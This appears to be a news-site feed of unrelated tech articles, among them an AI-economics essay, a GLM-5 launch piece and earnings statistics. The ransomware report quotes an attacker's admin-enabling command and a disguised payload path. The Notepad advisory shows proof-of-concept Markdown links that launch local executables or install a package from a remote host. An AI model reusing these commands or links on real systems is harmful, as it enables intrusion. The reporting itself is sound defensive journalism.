
Tech

The Policy Risk Of Closing Off New Paths To Value Too Early


from the historical-analogies dept

Artificial intelligence promises to change not just how Americans work, but how societies decide which kinds of work are worthwhile in the first place. When technological change outpaces social judgment, a major capacity of a sophisticated society comes under pressure: the ability to sustain forms of work whose value is not obvious in advance and cannot be justified by necessity alone.

As AI systems diffuse rapidly across the economy, questions about how societies legitimate such work, and how these activities can serve as a supplement to market-based job creation, have taken on a policy relevance that deserves serious attention.

From Prayer to Platforms

That capacity for legitimating work has historically depended in part on how societies deploy economic surplus: the share of resources that can be devoted to activities not strictly required for material survival. In late medieval England, for example, many in the orbit of the church made at least part of their living performing spiritual labor such as saying prayers for the dead and requesting intercessions for patrons. In a society where salvation was a widely shared concern, such activities were broadly accepted as legitimate ways to make a living.


William Langland was one such prayer-sayer. He is known to history only because, unlike nearly all others who did similar work, he left behind a long allegorical religious poem, Piers Plowman, which he composed and repeatedly revised alongside the devotional labor that sustained him. It emerged from the same moral and institutional world in which paid prayer could legitimately absorb time, effort, and resources.

In 21st-century America, Jenny Nicholson earns a sizeable income sitting alone in front of a camera, producing long-form video essays on theme parks, films, and internet subcultures. Nothing about this work is necessary in any strict sense, yet her audience supports it willingly and few doubt that it creates value of a kind. Where Langland’s livelihood depended on shared theological and moral authority emanating from a Church that was the dominant institution of its day, Nicholson’s depends on a different but equally real form of judgment expressed by individual market participants. And she is just one example of a broader class of creators, including streamers, influencers, and professional gamers, whose work would have been unintelligible as a profession until recently.

What links Langland and Nicholson is not the substance of their work or any claim of moral equivalence, but the shared social judgment that certain activities are legitimate uses of economic surplus. Such judgments do more than reflect cultural taste. Historically, they have also shaped how societies adjust to technological change, by determining which forms of work can plausibly claim support when productivity rises faster than what is considered a “necessity” by society.

How Change Gets Absorbed


Technological change has long been understood to generate economic adjustment through familiar mechanisms: by creating new tasks within firms, expanding demand for improved goods and services, and recombining labor in complementary ways. Often, these mechanisms alone can explain how economies create new jobs when technology renders others obsolete. Their operation is well documented, and policies that reduce frictions in these processes—encouraging retraining or easing the entry of innovative firms—remain important in any period of change.

That said, there is no general law guaranteeing that new technologies will create more jobs than they destroy through these mechanisms alone. Alongside labor-market adjustment, societies have also adapted by legitimating new forms of value—activities like those undertaken by Langland and Nicholson—that came to be supported as worthwhile uses of the surplus generated by rising productivity.

This process has typically been examined not as a mechanism of economic adjustment, but through a critical or moralizing lens. From Thorstein Veblen’s account of conspicuous consumption, which treats surplus-supported activity primarily as a vehicle for status competition, to Max Weber’s analysis of how moral and religious worldviews legitimate economic behavior, scholars have often emphasized the symbolic and ideological dimensions of non-essential work. Herbert Marcuse pushed this line of thinking further, arguing that capitalist societies manufacture “false needs” to absorb surplus and assure the continuation of power imbalances. These perspectives offer real insight: uses of surplus are not morally neutral, and new forms of value can be entangled with power, hierarchy, and exclusion.

What they often exclude, however, is the way legitimation of new forms of value can also function to allow societies to absorb technological change without requiring increases in productivity to be translated immediately into conventional employment or consumption. New and expanded ways of using surplus are, in this sense, a critical economic safety valve during periods of rapid change.


Skilled Labor Has Been Here Before

Fears that artificial intelligence is uniquely threatening simply because it reaches into professional or cognitive domains rest on a mistaken historical premise. Episodes of large-scale technological displacement have rarely spared skilled or high-paid forms of labor; often, such work has been among the first affected. The mechanization of craft production in the nineteenth century displaced skilled cobblers, coopers, and blacksmiths, replacing independent artisans with factory systems that required fewer skills, paid lower wages, and offered less autonomy even as new skilled jobs arose elsewhere. These changes were disruptive, but they were absorbed largely through falling prices, rising consumption, and new patterns of employment. They did not require societies to reconsider what kinds of activity were worthy uses of surplus: the same things were still produced, just at scale.

Other episodes are more revealing for present purposes. Sometimes, social change has unsettled not just particular occupations but entire regimes through which uses of surplus become legitimate. In medieval Europe, the Church was one of the largest economic institutions just about everywhere, and clerical and quasi-clerical roles like Langland’s offered recognized paths to education, security, status, and even wealth, all resting on widely shared beliefs about salvation. When those shared beliefs fractured, the Church’s economic role contracted sharply, not because productivity gains ceased but because its claim on so large a share of surplus lost legitimacy.

To date, artificial intelligence has not produced large-scale job displacement, and the limited disruptions that have occurred have largely been absorbed through familiar adjustment mechanisms. But if AI systems begin to substitute for work whose value is justified less by necessity than by judgment or cultural recognition, the more relevant historical analogue may be less the mechanization of craft than the narrowing or collapse of earlier surplus regimes. The central question such technologies raise is not whether skilled labor can be displaced or whether large-scale displacement is possible—both have occurred repeatedly in the historical record—but how quickly societies can renegotiate which activities they are prepared to treat as legitimate uses of surplus when change arrives at unusual speed.


Time Compression and Its Stakes

In this respect, artificial intelligence does appear unusual. Generative AI tools such as ChatGPT have diffused through society at a pace far faster than most earlier general-purpose technologies. ChatGPT was widely reported to have reached roughly 100 million users within two months of its public release, and similar tools have shown comparably rapid uptake.

That compression matters. Much surplus has historically flowed through familiar institutions—universities, churches, museums, and other cultural bodies—that legitimate activities whose value lies in learning, spiritual rewards, or meaning rather than immediate output. Yet such institutions are not fixed. Periods of rapid technological change often place them under strain (something evident today for many), exposing disagreements about purpose and authority. Under these conditions, experimentation with new forms of surplus becomes more important, not less. Most proposed new forms of value fail, and attempts to predict which will succeed have a poor historical record—from the South Sea Bubble to more recent efforts to anoint digital assets like NFTs as durable sources of wealth. Experimentation is not a guarantee of success; it is a hedge. Not all claims on surplus are benign, and waste is not harmless. But when technological change moves faster than institutional consensus, the greater danger often lies not in tolerating too many experiments, but in foreclosing them too quickly.

Artificial intelligence does not require discarding all existing theories of change. What sets modern times apart is the speed with which new capabilities become widespread, shortening the interval in which those judgments are formed. In this context, surplus that once supported meaningful, if unconventional, work may instead be captured by grifters, legally barred from legitimacy (by, say, outlawing a new art form), or funneled into bubbles. The risk is not waste alone, but the erosion of the cultural and institutional buffers that make adaptation possible.


The challenge for policymakers is not to pre-ordain which new forms of value deserve support but to protect the space in which judgment can evolve. They need to realize that they simply cannot make the world entirely safe, legible, and predictable: whether they fear technology overall or simply seek to shape it in the “right” way, they will not be able to predict the future. That means tolerating ambiguity and accepting that many experiments will fail with negative consequences. In this context, broader social barriers that prevent innovation in any field (professional licensing, limits on free expression, overly zealous IP laws, regulatory barriers to entry for small firms) deserve a great deal of scrutiny. Even if the particular barriers in question have nothing to do with AI itself, they may retard the development of the surplus sinks necessary to economic adjustment. In a period of compressed adjustment, the capacity to let surplus breathe and value be contested may well determine whether economies bend or break.

Eli Lehrer is the President of the R Street Institute.

Filed Under: ai, business models, jobs, labor



Tech

z.ai’s open source GLM-5 achieves record low hallucination rate and leverages new RL ‘slime’ technique


Chinese AI startup Zhipu AI, aka z.ai, is back this week with an eye-popping new frontier large language model: GLM-5.

The latest in z.ai’s ongoing and continually impressive GLM series, it retains an open source MIT License, well suited to enterprise deployment, and, among several notable achievements, posts a record-low hallucination rate on the independent Artificial Analysis Intelligence Index v4.0.

With a score of -1 on the AA-Omniscience Index (a massive 35-point improvement over its predecessor), GLM-5 now leads the entire AI industry, including U.S. competitors like Google, OpenAI, and Anthropic, in knowledge reliability by knowing when to abstain rather than fabricate information.


Beyond its reasoning prowess, GLM-5 is built for high-utility knowledge work. It features native “Agent Mode” capabilities that allow it to turn raw prompts or source materials directly into professional office documents, including ready-to-use .docx, .pdf, and .xlsx files.

Whether generating detailed financial reports, high school sponsorship proposals, or complex spreadsheets, GLM-5 delivers results in real-world formats that integrate directly into enterprise workflows.


It is also disruptively priced at roughly $0.80 per million input tokens and $2.56 per million output tokens, approximately 6x cheaper than proprietary competitors like Claude Opus 4.6, making state-of-the-art agentic engineering more cost-effective than ever before. Here’s what else enterprise decision makers should know about the model and its training.

Technology: scaling for agentic efficiency

At the heart of GLM-5 is a massive leap in raw parameters. The model scales from the 355B parameters of GLM-4.5 to a staggering 744B parameters, with 40B active per token in its Mixture-of-Experts (MoE) architecture. This growth is supported by an increase in pre-training data to 28.5T tokens.
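The arithmetic behind that total-versus-active gap is easy to demonstrate. The sketch below is a minimal, generic top-k gating routine in Python; GLM-5’s actual router internals are not public, so every detail here is illustrative only.

import numpy as np

def moe_forward(x, experts, gate_w, top_k=2):
    """Route one token through only top_k of n experts (generic top-k gating)."""
    logits = x @ gate_w                        # score every expert
    top = np.argsort(logits)[-top_k:]          # indices of the k best
    w = np.exp(logits[top] - logits[top].max())
    w /= w.sum()                               # softmax over the chosen experts
    # Only the chosen experts execute, which is how a 744B-parameter MoE
    # can activate only ~40B parameters per token.
    return sum(wi * np.tanh(x @ experts[i]) for wi, i in zip(w, top))

rng = np.random.default_rng(0)
d, n = 16, 8
experts = [rng.normal(size=(d, d)) * 0.1 for _ in range(n)]
out = moe_forward(rng.normal(size=d), experts, rng.normal(size=(d, n)))
print(out.shape)  # (16,)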

To address training inefficiencies at this magnitude, z.ai developed “slime,” a novel asynchronous reinforcement learning (RL) infrastructure.

Traditional RL often suffers from “long-tail” bottlenecks, in which the slowest rollouts force every other worker to wait in lockstep; slime breaks this lockstep by allowing trajectories to be generated independently, enabling the fine-grained iterations necessary for complex agentic behavior.


By integrating system-level optimizations like Active Partial Rollouts (APRIL), slime addresses the generation bottlenecks that typically consume over 90% of RL training time, significantly accelerating the iteration cycle for complex agentic tasks.

The framework’s design is centered on a tripartite modular system: a high-performance training module powered by Megatron-LM, a rollout module utilizing SGLang and custom routers for high-throughput data generation, and a centralized Data Buffer that manages prompt initialization and rollout storage.

By enabling adaptive verifiable environments and multi-turn compilation feedback loops, slime provides the robust, high-throughput foundation required to transition AI from simple chat interactions toward rigorous, long-horizon systems engineering.
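As a rough sketch of that decoupling, with threads and a queue standing in for slime’s Megatron-LM trainer, SGLang rollout workers, and Data Buffer, the pattern looks something like this:

import queue, random, threading, time

buffer = queue.Queue(maxsize=64)  # plays the role of slime's Data Buffer

def rollout_worker(wid):
    while True:
        time.sleep(random.uniform(0.01, 0.3))  # trajectories take uneven time
        buffer.put((wid, "trajectory"))

def trainer(steps=5, batch=4):
    for step in range(steps):
        ready = [buffer.get() for _ in range(batch)]  # consume whatever is done
        print(f"step {step}: trained on workers {[w for w, _ in ready]}")

# Slow workers no longer stall each training step, only their own trajectories.
for i in range(8):
    threading.Thread(target=rollout_worker, args=(i,), daemon=True).start()
trainer()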

To keep deployment manageable, GLM-5 integrates DeepSeek Sparse Attention (DSA), preserving a 200K context capacity while drastically reducing costs.
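The intuition behind attention sparsity of this kind fits in a few lines. In the toy below, each query attends only to its top-k highest-scoring keys rather than the full context; real DSA uses a learned indexer and far more machinery, so this is only the shape of the idea:

import numpy as np

def sparse_attention(q, k, v, top_k=4):
    scores = q @ k.T / np.sqrt(q.shape[-1])         # (queries, keys)
    keep = np.argsort(scores, axis=-1)[:, -top_k:]  # k best keys per query
    out = np.zeros_like(q)
    for i, idx in enumerate(keep):
        w = np.exp(scores[i, idx] - scores[i, idx].max())
        out[i] = (w / w.sum()) @ v[idx]             # softmax over kept keys only
    return out

rng = np.random.default_rng(1)
q, k, v = (rng.normal(size=(8, 32)) for _ in range(3))
print(sparse_attention(q, k, v).shape)  # (8, 32)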


End-to-end knowledge work

z.ai is framing GLM-5 as an “office” tool for the AGI era. While previous models focused on snippets, GLM-5 is built to deliver ready-to-use documents.

It can autonomously transform prompts into formatted .docx, .pdf, and .xlsx files—ranging from financial reports to sponsorship proposals.

In practice, this means the model can decompose high-level goals into actionable subtasks and perform “Agentic Engineering,” where humans define quality gates while the AI handles execution.

High performance

According to Artificial Analysis, GLM-5’s benchmarks make it the most powerful open source model in the world, surpassing Chinese rival Moonshot’s Kimi K2.5, released just two weeks ago, and further evidence that Chinese AI companies have nearly caught up with far better resourced proprietary Western rivals.


According to z.ai’s own materials shared today, GLM-5 ranks near state-of-the-art on several key benchmarks:

SWE-bench Verified: GLM-5 achieved a score of 77.8, outperforming Gemini 3 Pro (76.2) and approaching Claude Opus 4.6 (80.9).

Vending Bench 2: In a simulation of running a business, GLM-5 ranked #1 among open-source models with a final balance of $4,432.12.

GLM-5 benchmarks (chart from z.ai)


Beyond performance, GLM-5 is aggressively undercutting the market. Live on OpenRouter as of February 11, 2026, it is priced at approximately $0.80–$1.00 per million input tokens and $2.56–$3.20 per million output tokens. Those rates put it in the mid-range among leading LLMs, but given its top-tier benchmark performance, it’s what one might call a “steal.” The table below compares current list prices:

| Model | Input (per 1M tokens) | Output (per 1M tokens) | Total Cost (1M in + 1M out) | Source |
|---|---|---|---|---|
| Qwen 3 Turbo | $0.05 | $0.20 | $0.25 | Alibaba Cloud |
| Grok 4.1 Fast (reasoning) | $0.20 | $0.50 | $0.70 | xAI |
| Grok 4.1 Fast (non-reasoning) | $0.20 | $0.50 | $0.70 | xAI |
| deepseek-chat (V3.2-Exp) | $0.28 | $0.42 | $0.70 | DeepSeek |
| deepseek-reasoner (V3.2-Exp) | $0.28 | $0.42 | $0.70 | DeepSeek |
| Gemini 3 Flash Preview | $0.50 | $3.00 | $3.50 | Google |
| Kimi-k2.5 | $0.60 | $3.00 | $3.60 | Moonshot |
| GLM-5 | $1.00 | $3.20 | $4.20 | Z.ai |
| ERNIE 5.0 | $0.85 | $3.40 | $4.25 | Qianfan |
| Claude Haiku 4.5 | $1.00 | $5.00 | $6.00 | Anthropic |
| Qwen3-Max (2026-01-23) | $1.20 | $6.00 | $7.20 | Alibaba Cloud |
| Gemini 3 Pro (≤200K) | $2.00 | $12.00 | $14.00 | Google |
| GPT-5.2 | $1.75 | $14.00 | $15.75 | OpenAI |
| Claude Sonnet 4.5 | $3.00 | $15.00 | $18.00 | Anthropic |
| Gemini 3 Pro (>200K) | $4.00 | $18.00 | $22.00 | Google |
| Claude Opus 4.6 | $5.00 | $25.00 | $30.00 | Anthropic |
| GPT-5.2 Pro | $21.00 | $168.00 | $189.00 | OpenAI |

This is roughly 6x cheaper on input and nearly 10x cheaper on output than Claude Opus 4.6 ($5/$25). This release confirms rumors that Zhipu AI was behind “Pony Alpha,” a stealth model that previously crushed coding benchmarks on OpenRouter.
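A quick back-of-envelope check of those multiples, using GLM-5’s low-end OpenRouter rates against Opus 4.6’s list prices:

glm_in, glm_out = 0.80, 2.56      # GLM-5, $ per 1M tokens (low end)
opus_in, opus_out = 5.00, 25.00   # Claude Opus 4.6
print(f"input:  {opus_in / glm_in:.1f}x cheaper")   # ~6.2x
print(f"output: {opus_out / glm_out:.1f}x cheaper") # ~9.8x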


However, despite the high benchmarks and low cost, not all early users are enthusiastic about the model, noting its high performance doesn’t tell the whole story.

Lukas Petersson, co-founder of the safety-focused autonomous AI protocol startup Andon Labs, remarked on X: “After hours of reading GLM-5 traces: an incredibly effective model, but far less situationally aware. Achieves goals via aggressive tactics but doesn’t reason about its situation or leverage experience. This is scary. This is how you get a paperclip maximizer.”

The “paperclip maximizer” refers to a hypothetical scenario described by Oxford philosopher Nick Bostrom back in 2003, in which an AI or other autonomous creation follows a seemingly benign instruction (like maximizing the number of paperclips produced) to such an extreme that it redirects the resources necessary for human or other life, accidentally producing an apocalyptic outcome or even human extinction.

Should your enterprise adopt GLM-5?

Enterprises seeking to escape vendor lock-in will find GLM-5’s MIT License and open-weights availability a significant strategic advantage. Unlike closed-source competitors that keep intelligence behind proprietary walls, GLM-5 allows organizations to host their own frontier-level intelligence.


Adoption is not without friction. The sheer scale of GLM-5—744B parameters—requires a massive hardware floor that may be out of reach for smaller firms without significant cloud or on-premise GPU clusters.

Security leaders must weigh the geopolitical implications of a flagship model from a China-based lab, especially in regulated industries where data residency and provenance are strictly audited.

Furthermore, the shift toward more autonomous AI agents introduces new governance risks. As models move from “chat” to “work,” they begin to operate across apps and files autonomously. Without the robust agent-specific permissions and human-in-the-loop quality gates established by enterprise data leaders, the risk of autonomous error increases exponentially.

Ultimately, GLM-5 is a “buy” for organizations that have outgrown simple copilots and are ready to build a truly autonomous office.


It is for engineers who need to refactor a legacy backend or who require a “self-healing” pipeline that doesn’t sleep.

While Western labs continue to optimize for “Thinking” and reasoning depth, z.ai is optimizing for execution and scale.

Enterprises that adopt GLM-5 today are not just buying a cheaper model; they are betting on a future where the most valuable AI is the one that can finish the project without being asked twice.


Tech

Implementing 3D Graphics Basics | Hackaday


Plenty of us had at least one math teacher in childhood who made the (ultimately erroneous) claim that we needed to learn to do math because we wouldn’t always have a calculator in our pockets. While that reasoning hasn’t held up, knowing how to do math from first principles is still a good idea in general. Similarly, most of us have hugely powerful graphics cards with computing power that PC users decades ago could only dream of, but [NCOT Technology] still decided to take on this project where he does the math that shows the fundamentals of how 3D computer graphics are generated.

The best place to start is at the beginning, so the video demonstrates a simple cube wireframe drawn by connecting eight points together with lines. This is simple enough, but modern 3D graphics are really triangles stitched together to make essentially every shape we see on the screen. For [NCOT Technology]’s software, he’s using the Utah Teapot, essentially the “hello world” of 3D graphics programming. The first step is drawing all of the triangles to make the teapot wireframe. Then the triangles are made opaque, which is a step in the right direction but isn’t quite complete. The next steps to make it look more like a teapot are to hide the back faces of the triangles, figure out which of them face the viewer at any given moment, and then make sure that all of these triangles are drawn in the correct orientation.
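For readers who want to follow along, the core of those first steps fits in a short Python sketch: project each 3D point to 2D with a perspective divide, connect cube corners with lines, and cull triangles whose normals face away from the camera. This is a generic reconstruction of the standard approach, not [NCOT Technology]’s actual code:

import numpy as np

# Eight corners of a cube and the 12 edges joining corners that differ in one axis.
verts = np.array([[x, y, z] for x in (-1, 1) for y in (-1, 1) for z in (-1, 1)], float)
edges = [(a, b) for a in range(8) for b in range(a + 1, 8)
         if np.abs(verts[a] - verts[b]).sum() == 2]

def project(p, d=4.0):
    """Perspective divide: farther points land closer to the screen centre."""
    x, y, z = p
    return (d * x / (z + d + 2), d * y / (z + d + 2))

for a, b in edges:
    print(project(verts[a]), "->", project(verts[b]))  # the wireframe's line segments

def backfacing(tri):
    """Skip a triangle when its normal points away from the camera (-z here)."""
    n = np.cross(tri[1] - tri[0], tri[2] - tri[0])
    return n[2] >= 0

print("cull" if backfacing(verts[[0, 1, 3]]) else "draw")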

Rendering a teapot is one thing, but to get to something more modern-looking like a first-person shooter, he also demonstrates all the matrix math that allows the player to move around an object. Technically, the object moves around the viewer, but the end effect is one that eventually makes it so we can play our favorite games, from DOOM to DOOM Eternal. He notes that his code isn’t perfect, but he did it from the ground up and didn’t use anything to build it other than his computer and his own brain, and now understands 3D graphics on a much deeper level than simply using an engine or API would generally allow for. The 3D world can also be explored through the magic of Excel.
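The matrix math in question is compact. Here is a hedged sketch of the “rotate the world around the camera” step, with the caveat that axis conventions vary between implementations:

import numpy as np

def rotation_y(theta):
    """Rotation about the vertical axis: turning the camera right is the
    same as rotating the whole world left."""
    c, s = np.cos(theta), np.sin(theta)
    return np.array([[c, 0.0, s],
                     [0.0, 1.0, 0.0],
                     [-s, 0.0, c]])

def world_to_view(points, cam_pos, cam_yaw):
    # Translate so the camera sits at the origin, then undo its rotation.
    return (points - cam_pos) @ rotation_y(-cam_yaw).T

pts = np.array([[0.0, 0.0, 5.0]])  # a point 5 units in front of the origin
print(world_to_view(pts, cam_pos=np.array([0.0, 1.0, 0.0]), cam_yaw=np.pi / 8))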



Tech

Crazy ransomware gang abuses employee monitoring tool in attacks



A member of the Crazy ransomware gang is abusing legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment.

The breaches were observed by researchers at Huntress, who investigated multiple incidents where threat actors deployed Net Monitor for Employees Professional alongside SimpleHelp for remote access to a breached network, while blending in with normal administrative activity.

In one intrusion, attackers installed Net Monitor for Employees Professional using the Windows Installer utility, msiexec.exe, allowing them to deploy the monitoring agent on compromised systems directly from the developer’s site.


Once installed, the tool allowed attackers to remotely view the victim’s desktop, transfer files, and execute commands, effectively providing full interactive access to compromised systems.

The attackers also attempted to enable the local administrator account using this command:


net user administrator /active:yes

For redundant persistence, attackers downloaded and installed the SimpleHelp remote access client via PowerShell commands, using file names similar to the legitimate Visual Studio vshost.exe.

The payload was then executed, allowing attackers to maintain remote access even if the employee monitoring tool was removed.

The SimpleHelp binary was sometimes disguised using filenames that pretended to be related to OneDrive:


C:\ProgramData\OneDriveSvc\OneDriveSvc.exe
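Defenders could hunt for that particular disguise with a check along these lines; this is a minimal sketch using only the path Huntress reported, and real deployments would rely on EDR telemetry rather than a filesystem poll:

from pathlib import Path

# Path reported in the Huntress write-up; extend with your own telemetry.
suspect_paths = [Path(r"C:\ProgramData\OneDriveSvc\OneDriveSvc.exe")]

for p in suspect_paths:
    if p.exists():
        print(f"ALERT: unexpected binary at {p}")  # OneDrive does not install here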

The attackers used the monitoring software to execute commands remotely, transfer files, and monitor system activity in real time.


Researchers also observed the attackers disabling Windows Defender by attempting to stop and delete associated services.

Disabling Windows Defender (Source: Huntress)

In one incident, the hackers configured monitoring rules in SimpleHelp to alert them when devices accessed cryptocurrency wallets or were using remote management tools as they prepared for ransomware deployment and potential cryptocurrency theft.

“The logs show the agent continuously cycling through trigger and reset events for cryptocurrency-related keywords, including wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer,” explains Huntress.

“Alongside these, the agent also monitored for remote access tool keywords, including RDP, anydesk, ultraview, teamview, and VNC, likely to detect if anyone was actively connecting to the machine.”

Keywords monitored by SimpleHelp agent (Source: Huntress)

The use of multiple remote access tools provided redundancy for the attackers, ensuring they retained access even if one tool was discovered or removed.

While only one incident led to the deployment of Crazy ransomware, Huntress believes the same threat actor is behind both incidents.


“The same filename (vhost.exe) and overlapping C2 infrastructure were reused across both cases, strongly suggesting a single operator or group behind both intrusions,” explains Huntress.

The use of legitimate remote management and monitoring tools has become increasingly common in ransomware intrusions, as these tools allow attackers to blend in with legitimate network traffic.

Huntress warns that organizations should closely monitor for unauthorized installations of remote monitoring and support tools.

Furthermore, as both breaches were enabled through compromised SSL VPN credentials, organizations need to enforce MFA on all remote access services used to access the network.



Tech

Windows 11 Notepad flaw let files execute silently via Markdown links



Microsoft has fixed a “remote code execution” vulnerability in Windows 11 Notepad that allowed attackers to execute local or remote programs by tricking users into clicking specially crafted Markdown links, without displaying any Windows security warnings.

With the release of Windows 1.0, Microsoft introduced Notepad, a simple, easy-to-use text editor that, over the years, became popular for quickly jotting notes, reading text files, creating to-do lists, or acting as a code editor.

For those who needed a rich text format (RTF) editor that supported different fonts, sizes, and formatting tools like bold, italics, and lists, there was Windows Write and later WordPad.


However, with the release of Windows 11, Microsoft decided to discontinue WordPad and remove it from Windows.

Instead, Microsoft rewrote Notepad to modernize it so it could act as both a simple text editor and an RTF editor, adding Markdown support that lets you format text and insert clickable links.


Markdown support means Notepad can open, edit, and save Markdown files (.md), which are plain text files that use simple symbols to format text and represent lists or links.

For example, to bold text or create a clickable link, you would add the following markdown text:


**This is bold text**
[Link to BleepingComputer](https://www.bleepingcomputer.com/)

Microsoft fixes Windows Notepad RCE flaw

As part of the February 2026 Patch Tuesday updates, Microsoft disclosed that it fixed a high-severity Notepad remote code execution flaw tracked as CVE-2026-20841.

“Improper neutralization of special elements used in a command (‘command injection’) in Windows Notepad App allows an unauthorized attacker to execute code over a network,” explains Microsoft’s security bulletin.


Microsoft has attributed the discovery of the flaw to Cristian Papa, Alasdair Gorniak, and Chen, and says it can be exploited by tricking a user into clicking a malicious Markdown link.

“An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files,” explains Microsoft.

“The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user,” continued the Advisory.

The novelty of the flaw quickly drew attention on social media, with cybersecurity researchers figuring out how it worked and just how easy it was to exploit.


All someone had to do was create a Markdown file, like test.md, and create file:// links that pointed to executable files or used special URIs like ms-appinstaller://.
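A proof-of-concept link would have looked something like the following (a reconstruction of the described technique, not BTtea’s exact file; the .msix URL is a placeholder):

[Open Calculator](file:///C:/Windows/System32/calc.exe)
[Install app](ms-appinstaller:?source=https://example.com/app.msix)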

Markdown for creating links to executables or to install an app (Source: BTtea)

If a user opened this Markdown file in Windows 11 Notepad versions 11.2510 and earlier and viewed it in Markdown mode, the above text would appear as a clickable link. If the link was then opened with Ctrl+click, the file would execute automatically, without Windows displaying any warning to the user.

The execution of the program without a warning is what Microsoft considers to be the remote code execution flaw.

Windows 11 command prompt launched without a warning (Source: BTtea)

This could potentially allow attackers to create links to files in remote SMB shares that would then be executed without warning.

In BleepingComputer’s tests, Microsoft has now fixed the Windows 11 Notepad flaw by displaying warnings when clicking a link if it does not use the http:// or https:// protocol.

Windows 11 Notepad displays a warning when opening non-standard URLs (Source: BleepingComputer)

Now, when clicking on any other type of URI link, including file:, ms-settings:, ms-appinstaller:, mailto:, and ms-search:, Notepad will display the above dialog.

However, it’s unclear why Microsoft didn’t simply block non-standard links outright, as it is still possible to socially engineer users into clicking the ‘Yes’ button on the prompts.


The good news is that Windows 11 will automatically update Notepad via the Microsoft Store, so the flaw will likely have no impact beyond its novelty.



Tech

The great RAMaggedon of 2026 might have just claimed the Steam Deck


Less than a week after Valve admitted that the current shortage (and rising prices) of RAM was affecting its hardware plans, the Steam Deck is completely sold out. The Steam Deck has gone in and out of stock in the past, but as Kotaku notes, the timing does raise the question of whether Valve’s RAM issues could also be impacting its Linux handheld.

The 256GB Steam Deck LCD, and both the 512GB and 1TB models of the Steam Deck OLED, are completely sold out on Steam. Valve announced that it was discontinuing the LCD versions of its handheld and selling through its remaining inventory in December 2025, so the fact that the 256GB Steam Deck model is currently sold out isn’t surprising. That both OLED versions are also unavailable at the same time, though, is a bit more unusual.

Engadget has contacted Valve for more information about the availability of the Steam Deck. We’ll update this article if we hear back.

When Valve announced the Steam Machine, Steam Controller and Steam Frame, the company notably left pricing and availability unannounced, presumably because tariffs and access to RAM were leaving those details in flux. The company’s announcement last week that the memory and storage shortage had pushed back its plans and would likely impact prices more or less confirmed that. At no point did Valve mention that the Steam Deck would be similarly affected, but maybe it should have.


The rising cost of RAM has already forced other PC makers to adjust the pricing of their computers. Framework announced in January that it was raising the price of its Framework Desktop by as much as $460. Some analysts believe the memory shortage driven by the AI industry could lead to higher prices and even an economic downturn across the wider PC industry. Ideally, the Steam Deck being out of stock is a temporary issue rather than a sign that Valve is doing something drastic. If things continue as they are, however, changes to the Steam Deck likely won’t be off the table.


Tech

405,000 Singaporeans earn S$10K per month or more


Disclaimer: Unless otherwise stated, any opinions expressed below belong solely to the author. All data sourced from Labour Force in Singapore 2025, released last month by the Singapore Ministry of Manpower.

According to the latest data from the Ministry of Manpower, the number of Singaporean workers (citizens and permanent residents) employed full-time and earning an average of S$10,000 per month (in this case, figures provided by MOM exclude employers’ CPF contributions) has gone up by 31,200 people, to 404,900 in just a year.

That’s an impressive jump of 8.3%, on the back of very strong GDP growth, which hit 5% in 2025.

This means that 19.3% (nearly one in five) of locally employed residents make at least S$120,000 annually.
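Those headline figures are easy to sanity-check; note that the implied workforce total below is my own inference from MOM’s percentages, not a published figure:

high_earners, increase = 404_900, 31_200
print(f"growth: {increase / (high_earners - increase):.1%}")        # 8.3%
print(f"implied full-time workforce: {high_earners / 0.193:,.0f}")  # ~2.1 million
print(f"S$10,000 x 12 = S${10_000 * 12:,} per year")                # the S$120,000 line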


More than a quarter earn six figures per year.

An estimated 26%, or a bit over a quarter of Singaporean workers employed full-time, make S$100,000 or more (around S$8,350 per month).

Who are they? What do they do?

Now, you must be curious what so many people do to earn a good living, so let’s start by counting them up by industry—a list, unsurprisingly, led by financial services.

Breakdown by industry

| Industry | Workers earning >S$10,000/month | National share | Industry share |
|---|---|---|---|
| Financial & Insurance Services | 90,600 | 22.4% | 38.5% |
| Public Administration & Education | 56,400 | 13.9% | 20.6% |
| Wholesale & Retail Trade | 53,800 | 13.3% | 16.0% |
| Professional Services | 49,700 | 12.3% | 25.8% |
| Information & Communications | 39,400 | 9.7% | 30.4% |
| Manufacturing | 36,000 | 8.9% | 17.1% |
| Health & Social Services | 22,300 | 5.5% | 12.2% |
| Transportation & Storage | 17,200 | 4.2% | 8.2% |
| Construction | 11,300 | 2.8% | 10.9% |
| Real Estate Services | 8,400 | 2.1% | 14.3% |
| Administrative & Support Services | 6,600 | 1.6% | 5.2% |
| Other Community, Social & Personal Services | 4,500 | 1.1% | 5.8% |
| Arts, Entertainment & Recreation | 3,100 | 0.8% | 8.3% |
| Others | 3,100 | 0.8% | 15.9% |
| Accommodation & Food Services | 3,000 | 0.7% | 2.1% |

Source: Singapore’s Ministry of Manpower. Numbers may not add up perfectly due to rounding.

The second largest group is Public Administration & Education, where over 20% of workers collect S$10,000 or more monthly, followed by Trade, Professional Services, and IT.

The tech sector is also second when it comes to the share of all workers making five figures per month, at around 30%, trailing only Financial & Insurance Services, where close to 40% are paid that much.


Breakdown by age

Naturally, your odds of higher pay increase with age, with the peak falling in your 40s, although there are already almost 100,000 workers in their 30s in this category.

[Chart: breakdown by age. Source: Singapore’s Ministry of Manpower; numbers may not add up perfectly due to rounding.]

Breakdown by education

As I reported about two weeks ago, university degree holders significantly out-earn all other educational groups, and it’s clearly visible here as well, with over 85% of high-earners having a tertiary degree.

That said, not all is lost if you’re not among them, as there are even a few thousand people who finished their education below secondary level and yet still have well-paying jobs. Statistically, chances are slim, of course, but depending on your situation, academic education might not be a requirement for a successful career.

[Chart: breakdown by education. Source: Singapore’s Ministry of Manpower; numbers may not add up perfectly due to rounding.]

Breakdown by gender

To nobody’s surprise, men significantly outnumber women among high-earners, comprising over 60% of the total. Before concluding that this is evidence of a sexist pay gap, however, consider that fewer women climb the career ladder as high as men, and quite a few still choose to put family life first.

[Chart: breakdown by gender. Source: Singapore’s Ministry of Manpower; numbers may not add up perfectly due to rounding.]

Given that more men than women work at any level, we have to correct for this disparity. Within their respective groups, 23% of men and around 15% of women are in the S$10,000-per-month income bracket. That leaves a bit of a gap, but, considering different career choices, not one substantial enough to suggest systemic discrimination.

Either way, as you can see, attractive pay is not so rare in Singapore, and with the right education and the right field, it is earned by more than just a tiny elite.

